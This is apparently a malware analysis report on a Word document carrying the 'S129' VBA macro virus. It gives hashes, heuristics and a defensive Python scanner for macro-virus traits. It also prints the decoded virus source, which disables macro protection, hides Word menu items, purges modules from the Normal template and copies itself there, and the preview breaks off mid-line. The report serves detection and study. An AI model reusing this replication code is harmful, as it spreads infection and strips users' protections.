Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e52261cbbe1354b3…

MALICIOUS

Office (OLE)

Size: 35.0 KB
Created (OLE metadata): 2000-01-17 20:30:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 4297fd5d20cd182d4b91dec92778da83
SHA-1: a6221dda4de5fc5e8c171a5939780db63ca3ceee
SHA-256: e52261cbbe1354b3d596157fb109549e29f7dcbed05116c3f582c66a3fac07cf
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file is a Word document carrying a VBA macro virus. On AutoOpen the macro turns off Word's macro virus protection (Options.VirusProtection = False), briefly re-enables and then disables auto macros through the legacy WordBasic.DisableAutoMacros call, and renames and disables the Tools > Macro and Tools > Templates and Add-ins commands so the infection is harder to inspect from the Word UI. Dok2Nor then deletes every module in the Normal template other than its own (S129, S129Form) and ThisDocument via Application.OrganizerDelete, copies S129 and S129Form from the open document into the Normal template with Application.OrganizerCopy, and saves the template; its counterpart Nor2Dok performs the same purge-and-copy in the reverse direction, from the Normal template into the active document. A macro named FileOpen intercepts Word's built-in File > Open command (its body is cut off in the preview). The AutoOpen entry point combined with this self-replication into the Normal template is what establishes malicious intent; the OLE_VBA_MACROS heuristic by itself only confirms that macro code is present. The comments in the source identify the code as an Indonesian macro virus signed "S129 Good DocHacker" and claim it is harmless; the 22 July 1998 date there and the document's 2000-01-17 OLE creation timestamp are both author-supplied and not evidence of provenance.

Heuristics 4

  • ClamAV: Doc.Trojan.Doghack-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Doghack-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. On this sample the first half of that generic description is stale: olevba did decode a VBA project (see Extracted artifacts) and ClamAV names a family (Doc.Trojan.Doghack-1), so read this marker as corroboration of the AutoOpen and FileOpen entry points rather than as a standalone finding.
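The behaviours called out in the summary and in the heuristics above can be triaged mechanically from the decoded VBA text that olevba emits (the macros.bas artifact below). The scanner that follows is an added example written for this page; it is not part of the report's pipeline or of oletools. It joins VBA line continuations and resolves `Set X = NormalTemplate` aliases before matching, because the replication call in this sample spreads `OrganizerCopy ... Destination:=NT.FullName` over three physical lines and never names NormalTemplate directly, so a plain grep for "NormalTemplate" near "OrganizerCopy" misses it. The rule names, severities and the condensed SAMPLE_VBA are this example's own constructions modelled on the macro in the preview, not the report's heuristic identifiers.

```python
"""Triage decoded Word VBA for macro-virus traits (added example, not the report's code)."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample: condensed stand-in for the decoded macros.bas in this report.
SAMPLE_VBA = """\
Attribute VB_Name = "S129"
Sub Dok2Nor()
    Options.VirusProtection = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    Application.OrganizerDelete Source:=NT.FullName, Name:=NMacr, _
        Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=AD.FullName, _
        Destination:=NT.FullName, Name:= _
        "S129", Object:=wdOrganizerObjectProjectItems
End Sub
Sub AutoOpen()
    WordBasic.DisableAutoMacros 0
    CommandBars("Tools").Controls("Macro").Enabled = False
    Call Dok2Nor
    WordBasic.DisableAutoMacros 1
End Sub
Sub FileOpen()
    WordBasic.DisableAutoMacros 1
End Sub
"""

@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line_no: int  # first physical line of the logical (continuation-joined) statement
    text: str

# "{NT}" is substituted at scan time with every name resolved to the Normal template.
RULES = [
    ("auto_exec_entry", "high",
     r"^(?:Public\s+|Private\s+)?Sub\s+(?:Auto(?:Open|Exec|Close|New|Exit)|Document_(?:Open|Close))\b"),
    ("builtin_command_hook", "medium",
     r"^(?:Public\s+|Private\s+)?Sub\s+(?:File(?:Open|Save|SaveAs|Close)|Tools(?:Macro|Options))\b"),
    ("macro_security_tamper", "high",
     r"Options\.VirusProtection\s*=\s*False|WordBasic\.DisableAutoMacros\b"),
    ("ui_tamper", "medium",
     r"CommandBars\(.*\)\.Controls\(.*\)\.(?:Enabled\s*=\s*False|Visible\s*=\s*False|Caption\s*=)"),
    ("normal_template_write", "critical", r"OrganizerCopy\b.*Destination\s*:=\s*(?:{NT})\b"),
    ("normal_template_purge", "high", r"OrganizerDelete\b.*Source\s*:=\s*(?:{NT})\b"),
]
_CONTINUATION = re.compile(r"\s_\s*$")
_NORMAL_ALIAS = re.compile(r"^Set\s+(\w+)\s*=\s*NormalTemplate\b", re.I)

def join_continuations(src: str) -> list[tuple[int, str]]:
    """Merge VBA ' _' continuations; return (first physical line, stripped text) pairs."""
    logical: list[tuple[int, str]] = []
    buf, start = "", 0
    for no, raw in enumerate(src.splitlines(), 1):
        if not buf:
            start = no
        if _CONTINUATION.search(raw):
            buf += _CONTINUATION.sub(" ", raw)
            continue
        logical.append((start, (buf + raw).strip()))
        buf = ""
    if buf:  # dangling continuation at end of input
        logical.append((start, buf.strip()))
    return logical

def normal_template_aliases(lines: list[tuple[int, str]]) -> set[str]:
    """NormalTemplate plus every 'Set X = NormalTemplate' alias (the sample uses NT)."""
    names = {"NormalTemplate"}
    names.update(m.group(1) for _, text in lines if (m := _NORMAL_ALIAS.match(text)))
    return names

def scan(src: str) -> list[Finding]:
    """Run every rule over each non-comment logical line."""
    lines = join_continuations(src)
    alias = "|".join(re.escape(n) for n in sorted(normal_template_aliases(lines)))
    compiled = [(name, sev, re.compile(pat.replace("{NT}", alias), re.I)) for name, sev, pat in RULES]
    findings: list[Finding] = []
    for no, text in lines:
        if text.startswith("'") or text.lower().startswith("rem "):
            continue
        findings.extend(Finding(name, sev, no, text) for name, sev, rx in compiled if rx.search(text))
    return findings

def classify(findings: list[Finding]) -> str:
    """Replication into Normal.dot reached from an auto-exec entry point is the macro-virus signature."""
    hit = {f.rule for f in findings}
    entry = bool(hit & {"auto_exec_entry", "builtin_command_hook"})
    if entry and "normal_template_write" in hit:
        return "macro_virus"
    return "suspicious_autoexec" if entry else "no_macro_virus_traits"

if __name__ == "__main__":
    for f in scan(SAMPLE_VBA):
        print(f"{f.severity:8} {f.rule:22} line {f.line_no:>3}: {f.text[:60]}")
    print("verdict:", classify(scan(SAMPLE_VBA)))
```

To run this against a real file, feed it the decoded source that oletools produces (for example the output of `olevba --decode sample.doc`, or the `vba_code` values yielded by `VBA_Parser(path).extract_macros()` concatenated into one string); `line_no` then refers to that concatenated text. The verdict deliberately requires both an entry point and a write into the Normal template: an AutoOpen that only shows a message box is reported as suspicious, not as a macro virus.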

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5867 bytes
SHA-256: ea28d229f83d5e64de5c6d09443a1dfffb2cd1f4a0837392294a81ca57f84553
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "S129"
' Assalamu'alaikum Wr. Wb.......
' Surabaya, Rabu, 22 Juli 1998
' Virus Macro program by S129 Good DocHacker
' ------------------------- Indonesia ------
' Mohon ma'af bila telah mengganggu Anda.
' Program ini tidak merusak sistem atau file anda.
' Isi virus ini hanya sekedar informasi omong kosong belaka....
' ------------------------- Suroboyo-an -----
' Sepurane lek iki wis ngganggu sampeyan
' Program iki gak ngrusak sistem utawa file sampeyan
' Isine virus iki mek sekedar informasi nggacor thok.....
' -------------------------------------------
' [translation of the author's comments above; the original text is kept because it is a usable signature string]
' "Peace be upon you. Surabaya, Wednesday, 22 July 1998. Macro virus program by S129 Good DocHacker.
'  Apologies if this has disturbed you. This program does not damage your system or files.
'  The content of this virus is nothing but nonsense." The Suroboyo-an block repeats the last
'  three sentences in Surabaya-dialect Javanese.
Public NormInfected As Boolean
Public DocInfected As Boolean
Public wisGanti As Boolean
Public docSave As Boolean
Sub Dok2Nor()
    ' [analyst] Dok2Nor = document -> Normal.dot: switch off Word's macro virus protection prompt,
    ' purge foreign modules from Normal.dot, then copy the virus in.
    Options.VirusProtection = False
    idx = 0
    On Error GoTo Erw1
    NormInfected = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Erh1a
    ' [analyst] walk the Normal.dot VBA project: keep only S129, S129Form and ThisDocument and delete
    ' every other module (idx compensates for the collection shrinking after each delete)
    jumM = NT.VBProject.VBComponents.Count
    If jumM > 1 Then
    For i = 1 To jumM
      NMacr = NT.VBProject.VBComponents(1 + idx).Name
      If NMacr = "S129" Then NormInfected = True
      If (NMacr <> "S129") And (NMacr <> "S129Form") And (NMacr <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NT.FullName, Name:=NMacr, _
        Object:=wdOrganizerObjectProjectItems
      Else
        idx = idx + 1
      End If
    Next i
    End If
Erh1a:
    ' [analyst] self-replication: copy S129 and S129Form from the open document into Normal.dot and save it
    If NormInfected = False Then
      On Error GoTo Erh1
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "S129", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "S129Form", Object:=wdOrganizerObjectProjectItems
      Templates(NT.FullName).Save
Erh1:
    End If
Erw1:
End Sub
' [analyst] Nor2Dok = Normal.dot -> document: the mirror of Dok2Nor, purging the active document's
' modules and copying the virus from the infected Normal.dot into it (docSave flags that a save is due)
Sub Nor2Dok()
    On Error GoTo Erw2
    DocInfected = False
    docSave = False
    idx = 0
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Erh2a
    jumM = AD.VBProject.VBComponents.Count
    If jumM > 1 Then
    For i = 1 To jumM
      NMacr = AD.VBProject.VBComponents(1 + idx).Name
      If NMacr = "S129" Then DocInfected = True
      If (NMacr <> "S129") And (NMacr <> "S129Form") _
      And (NMacr <> "ThisDocument") Then 'And (nmacr <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=AD.FullName, Name:=NMacr, _
        Object:=wdOrganizerObjectProjectItems
      Else
        idx = idx + 1
      End If
    Next i
    End If
Erh2a:
    If DocInfected = False Then
      On Error GoTo Erh2
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "S129", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "S129Form", Object:=wdOrganizerObjectProjectItems
      docSave = True
Erh2:
    End If
Erw2:
End Sub
Sub AutoOpen()
    wisGanti = False
    NormInfected = False
    ' [analyst] legacy WordBasic call: 0 re-enables auto macros, 1 disables them; the macro disables
    ' them again once it has infected Normal.dot (end of this Sub, and again in FileOpen below)
    WordBasic.DisableAutoMacros 0
    On Error Resume Next
    If (wisGanti = False) And (NormInfected = False) Then
      ' [analyst] rename and disable Tools > Macro and Tools > Templates and Add-ins so the
      ' infection is harder to inspect or remove from the Word UI
      CommandBars("Help").Controls("About Microsoft Word").Caption = ("Assalamu'alaikum Wr. Wb.....")
      CommandBars("Tools").Controls("Macro").Visible = True
      CommandBars("Tools").Controls("Macro").Enabled = False
      CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = False
      CommandBars("Tools").Controls("Macro").Caption = ("Makmu, Cok.....!!!!")
      CommandBars("Tools").Controls("Templates and Add-ins...").Caption = ("Tempe dan Tahu Enak...!!!")
    End If
    wisGanti = True
    Call Dok2Nor
    WordBasic.DisableAutoMacros 1
End Sub
' [analyst] a Sub named FileOpen in a global template replaces Word's built-in File > Open command;
' its body is cut off in this preview
Sub FileOpen()
    WordBasic.DisableAutoMacros 1
    Dialogs(wdDialogFileO
... (truncated)